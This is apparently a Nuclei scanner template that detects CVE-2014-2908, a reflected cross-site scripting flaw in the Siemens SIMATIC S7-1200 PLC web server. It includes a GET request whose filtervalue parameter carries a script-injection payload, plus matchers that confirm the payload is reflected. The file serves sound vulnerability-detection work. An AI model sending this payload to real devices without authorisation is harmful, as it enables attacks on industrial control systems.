nuclei-templates/http/cves/2014/CVE-2014-2908.yaml

51 lines
1.9 KiB
YAML

id: CVE-2014-2908
info:
name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
remediation: Upgrade to v4.0 or later.
reference:
- https://www.exploit-db.com/exploits/44687
- https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2014-2908
- http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02
- http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-892012.pdf
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2014-2908
cwe-id: CWE-79
epss-score: 0.00594
epss-percentile: 0.759
cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: siemens
product: simatic_s7_cpu_1200_firmware
tags: cve,cve2014,xss,siemens,edb
http:
- method: GET
path:
- '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402202c73948411560103b8f5c49014a2d1fff0ed14ddb5d4496f5cf0386ed7257d0e02206eefceed30f5e37d37d7999b4b123ecdfd39fb3cdf636ce94634a393478d6e25:922c64590222798bb761d5b6d8e72950